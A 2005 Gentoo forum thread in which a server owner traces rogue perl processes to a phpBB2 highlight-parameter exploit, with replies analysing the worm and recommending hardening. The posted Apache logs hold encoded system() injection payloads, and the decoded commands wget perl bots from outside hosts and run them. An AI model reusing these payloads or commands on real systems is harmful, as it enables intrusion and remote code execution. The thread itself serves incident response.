# Some kind of hacking attempt with apache? [RESOLVED]

## uncleringo

Hi

I received an email from my server hosting company today alerting me to the fact that there had been an unusual amount of traffic from my server since last night.

Upon running top I saw 3 perl processes each taking up around 30% cpu, and had been running for some hours.

********[edit]*********

I jumped to the conclusion that references to perl in my apache logs pointed to the culprit. But having had some time think about those log entries, I am now certain that they can't have been to blame. My scripts don't do anything dangerous like taking arbitrary parameters and parsing, or even worse, executing them.

********[edit2]********

It seems a vulnerability was exploited in phpBB2. The following apache access log entries look like the cuplrits;

65.16.108.130 - - [03/Mar/2005:09:25:09 +0100] "GET /phpBB2/viewtopic.php?t=77&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527 HTTP/1.0" 200 32736 "-" "Mozilla/4.0"

65.16.108.130 - - [03/Mar/2005:09:25:10 +0100] "GET /phpBB2/viewtopic.php?t=77&highlight=%2527%252Esystem(chr(109)%252Echr(107)%252Echr(100)%252Echr(105)%252Echr(114)%252Echr(32)%252Echr(47)%252Echr(116)%252Echr(109)%252Echr(112)%252Echr(47)%252Echr(46)%252Echr(9 :Cool: %252Echr(111)%252Echr(102)%252Echr(59)%252Echr(119)%252Echr(103)%252Echr(101)%252Echr(116)%252Echr(32)%252Echr(102)%252Echr(114)%252Echr(97)%252Echr(103)%252Echr(46)%252Echr(112)%252Echr(114)%252Echr(111)%252Echr(46)%252Echr(9 :Cool: %252Echr(114)%252Echr(47)%252Echr(100)%252Echr(101)%252Echr(97)%252Echr(100)%252Echr(99)%252Echr(111)%252Echr(119)%252Echr(47)%252Echr(102)%252Echr(100)%252Echr(32)%252Echr(45)%252Echr(79)%252Echr(32)%252Echr(47)%252Echr(116)%252Echr(109)%252Echr(112)%252Echr(47)%252Echr(46)%252Echr(9 :Cool: %252Echr(111)%252Echr(102)%252Echr(47)%252Echr(46)%252Echr(102)%252Echr(100)%252Echr(59)%252Echr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(47)%252Echr(116)%252Echr(109)%252Echr(112)%252Echr(47)%252Echr(46)%252Echr(9 :Cool: %252Echr(111)%252Echr(102)%252Echr(47)%252Echr(46)%252Echr(102)%252Echr(100))%252E%2527 HTTP/1.0" 200 51870 "-" "Mozilla/4.0"

65.16.108.130 - - [03/Mar/2005:09:25:14 +0100] "GET /phpBB2/viewtopic.php?t=77&highlight=%2527%252Esystem(chr(119)%252Echr(103)%252Echr(101)%252Echr(116)%252Echr(32)%252Echr(102)%252Echr(114)%252Echr(97)%252Echr(103)%252Echr(46)%252Echr(112)%252Echr(114)%252Echr(111)%252Echr(46)%252Echr(9 :Cool: %252Echr(114)%252Echr(47)%252Echr(100)%252Echr(101)%252Echr(97)%252Echr(100)%252Echr(99)%252Echr(111)%252Echr(119)%252Echr(47)%252Echr(9 :Cool: %252Echr(111)%252Echr(116)%252Echr(32)%252Echr(45)%252Echr(79)%252Echr(32)%252Echr(47)%252Echr(116)%252Echr(109)%252Echr(112)%252Echr(47)%252Echr(46)%252Echr(9 :Cool: %252Echr(111)%252Echr(102)%252Echr(47)%252Echr(46)%252Echr(9 :Cool: %252Echr(111)%252Echr(116)%252Echr(59)%252Echr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(47)%252Echr(116)%252Echr(109)%252Echr(112)%252Echr(47)%252Echr(46)%252Echr(9 :Cool: %252Echr(111)%252Echr(102)%252Echr(47)%252Echr(46)%252Echr(9 :Cool: %252Echr(111)%252Echr(116)%252Echr(59)%252Echr(116)%252Echr(111)%252Echr(117)%252Echr(99)%252Echr(104)%252Echr(32)%252Echr(47)%252Echr(116)%252Echr(109)%252Echr(112)%252Echr(47)%252Echr(46)%252Echr(9 :Cool: %252Echr(115)%252Echr(101)%252Echr(116))%252E%2527 HTTP/1.0" 200 51934 "-" "Mozilla/4.0"

They're basically passing arguments to phpbb2 to execute system commands. When all those chr(n)'s are decoded it looks more like this;

system('perl -e "print q(jSVowMsd)"')

system('mkdir /tmp/.bof;wget frag.pro.br/deadcow/fd -O /tmp/.bof/.fd;perl /tmp/.bof/.fd')

system('wget frag.pro.br/deadcow/bot -O /tmp/.bof/.bot;perl /tmp/.bof/.bot;touch /tmp/.bset')

Isn't that nice. So beware, keep phpBB2 up to date (and everything else for that matter!). I've learnt my lessonLast edited by uncleringo on Thu Mar 03, 2005 4:49 pm; edited 3 times in total

----------

## j-m

Uhm, is this your web?!

http://www.ownz.go.ro/

 *Quote:*   

> 
> 
> HacKeD
> 
> bY
> ...

 

If so, then you are asking quite late...  :Rolling Eyes: 

----------

## uncleringo

No it's not  :Smile: 

----------

## someguy

i wouldnt be smiling there going to finger you for it because they were using you as a relay  :Evil or Very Mad: 

----------

## uncleringo

Yes that may be the case, but until someone explains to me how this happened in the first place I have no idea how to stop it happening again.

Surely someone out there knows what these log entries mean?

----------

## fatalglitch

http://www.ownz.go.ro/is

This looks to be source code for an http based worm.....anyone who programs shed some light? I'm not exactly a code warrior....

-Tom

----------

## fatalglitch

This code appears to run around and check for a current vulnerability. My guess is you have it.

Once it exploits this vulnerability, it downloads, compiles and runs code in the /var/tmp directory.

Files to look for are:

.bo

bo.c

and mainly /var/tmp/.bst

This file was added at the end of the script...possibly a log file of some sort?

Language of comments in file are Portuguese....

That's about as much as I can help....

-Tom

----------

## fatalglitch

open LOG,">>.iz2";

one more thing.... the code opens a log file named .iz2

Try searching for that.

-Tom

P.S. If your site uses PostNuke content management software, that is what this bug is looking for....

/jSVowMsd/    is the URL as it appears. Check the forums of PostNuke, its there....

----------

## uncleringo

Thanks. Have you any idea where I would start searching for it?

I have no content management software running. This is really looking like a mystery at the moment. The only log entry that appears around the start of my 15-20 Mb/s mayhemic network activity on monday is the entry that mentions libperl;

193.129.101.36 - - [28/Feb/2005:17:14:24 +0100] "HEAD /index.php?content=folder&id=8828 HTTP/1.1" 200 - "-" "libwww-perl/5.69"

But this line has shown up 3 more times since then with no more bad things happening on my server. I really have to learn what exactly the logs report!

----------

## uncleringo

So, having read a little on the log format I know know that the "libwww-perl/5.69" bit is the user agent. Which doesn't really help me at all  :Confused: 

Maybe the problem didn't even come from apache?!

----------

## fatalglitch

That first link I sent of code....is written in perl....

If you are somehow allowing execution of remote code....that is how it happened.

He redirected libwww-perl's input to be from a remote file. The remote file then installed the worm on your server space and ran it.

That is how this happened.

-Tom

----------

## uncleringo

Ok, thanks for your time and help. None of the files you mentioned are to be found in /var/tmp however.

This machine had a fresh install of gentoo just over a week ago, and I've made minimal alterations to the apache config. So unless the default config is to allow remote execution of code then I don't see how any of this could have happened. It's a mystery to me.

----------

## someguy

::wow::

you might want to think about updating and hardening and maybe even go as far as chrooting apache i did it on mine and its really not all that hard  :Razz: 

----------

## uncleringo

Scary isn't it.

I'm currently going through the Gentoo Security Guide. I'm planning on setting up some sort of early warning system which checks for high cpu loads and bandwidth usage. I'm also going to use the logcheck tool as it seems like a very good idea.

If you say chrooting apache isn't difficult then I'll definately do that too  :Smile: 

I wish I'd had more time to check where the perl processes had been started from etc before killing them, but I was more concerned with stopping the 20Mbs traffic. Since I only get 50GB monthly traffic and this attack has generated at least 200GB then it's going to have been a costly experience for me when I get the bill. I am determind as hell not to let this ever happen again!

----------

## rex123

You say you have a default apache installation, and no content management software. But judging by your logs I would put money on this being an exploit of a known php bug (you seem to be running php). Most likely not in php itself, but in some php code that you have installed.

----------

## uncleringo

Ok, do you know of anything I can do to stop similar exploits other than unmerging php? Since upgrading the OS from redhat 8 to gentoo last week I also installed php 5 for the first time. Perhaps I should go back to php 4 since I'm not yet using any of the new features?

----------

## Shiner_Man

 *someguy wrote:*   

> ::wow::
> 
> you might want to think about updating and hardening and maybe even go as far as chrooting apache i did it on mine and its really not all that hard 

 

Can you link me to the "not all that hard" guide you used to chroot apache?

----------

## j-m

You could have a look at mod_security  :Wink: 

----------

## rex123

 *uncleringo wrote:*   

> Ok, do you know of anything I can do to stop similar exploits other than unmerging php? Since upgrading the OS from redhat 8 to gentoo last week I also installed php 5 for the first time. Perhaps I should go back to php 4 since I'm not yet using any of the new features?

 

If you are running any php code that wasn't written by you, check for updates from the authors. Or use emerge -u if you used emerge to get the code.

Also look at your php.ini, and consider enabling safe mode. This disables a load of stuff (see http://uk.php.net/manual/en/features.safe-mode.functions.php). You could also set safe_mode_exec_dir. See http://uk.php.net/features.safe-mode for more.

Read http://uk.php.net/manual/en/security.php as well if you like :)

----------

## uncleringo

Thanks for the advice. I'll have a read through the things you've pointed out.

----------

## rex123

By the way, this line

```
var/log/apache2/access_log:210.68.60.199 - - [24/Feb/2005:17:56:57 +0100] "GET /index.php?page=http://67.18.54.212/~greg/cmd.txt&cmd=wget%20www.ownz.go.ro/is%20-O%20/var/tmp/.is;perl%20/var/tmp/.is; HTTP/1.0" 200 19104 "-" "Mozilla/4.0" 

```

from your logs shows that you have (or had) a page called index.php, which takes a parameter cmd. Whatever is sent in this parameter is executed by php (it seems). What someone did was to use this to execute

```
wget www.ownz.go.ro/is -O /var/tmp/.is
```

then 

```
perl /var/tmp/.is
```

/var/tmp/.is is an automated hacking script that does google searches for sites like yours, and runs itself there, etc.

It is easy to write a php script that does all that, and it doesn't mean you have a security hole in php itself. But it's not very sensible, because you are effectively allowing the world to run stuff on your computer. Which, sooner or later, they will probably do.

----------

## uncleringo

You're correct in saying that I have a script called index.php. However, I do not take any parameters and actually execute them on the machine. cmd is not used in any php scripts i have. I know that would be an extremely silly thing to do  :Smile: 

----------

## j-m

 *uncleringo wrote:*   

> You're correct in saying that I have a script called index.php. However, I do not take any parameters and actually execute them on the machine. cmd is not used in any php scripts i have. I know that would be an extremely silly thing to do 

 

Ehm, I would suggest auditing the script as obviously there are some serious security flaws.  :Razz: 

----------

## uncleringo

Ehm.. The script DOES NOT execute system commands. It takes a very limited number of arguments and there is no way of getting it to do anything nasty.

----------

## j-m

 *uncleringo wrote:*   

> Ehm.. The script DOES NOT execute system commands. It takes a very limited number of arguments and there is no way of getting it to do anything nasty.

 

Well, seeing the logs, the script is vulnerable to cross-site scripting. That´s probably all what I can say.

----------

## uncleringo

It seems to me that the logs show an attempt to do some cross-site scripting, but they definately wouldn't have succeeded since I don't parse any of the suspect arguments. I was assuming that these log entries were resonsible for the appearence of some rogue perl processes, but I now realise that these accesses could not (through my scripts at least) have caused any harm.

I'm actually starting to get a little suspicious of my hosting company since I recently negociated a lower price from them, and they performed the gentoo installation shortly after that. AND they've just tried to charge me for extra traffic that was in fact due to backups to their own servers which are located inside the same network as my server  :Evil or Very Mad: 

----------

## fatalglitch

if you don't mind me asking, who is your hosting company?

If your site is not TOO bandwith intensive, I have a box that runs hosting and could possibly help you out in the meantime if you were to switch. Let me know.

-Tom

----------

## uncleringo

That's really kind of you, but unfortunately I'm stuck in a 12 month contract which doesn't expire until october. I may have been a little hasty to start pointing my finger at them (webhosting24.co.uk) for this particular problem, as it seems a vulnerability with phpBB2 was to blame. However that doesn't excuse them for trying to get over £400 out of me for traffic generated by backing up to their own backup server!

The site I have running on this server is www.albumsnaps.com. I don't know how much you mean by 'too bandwidth intensive' but it generates about 25GB/month (half of my allowance). And also I expect you'd be put off by it having around 40GB of photos stored on it?

Thanks again for your offer though. There are some definately some nice people in the world  :Smile: 

----------

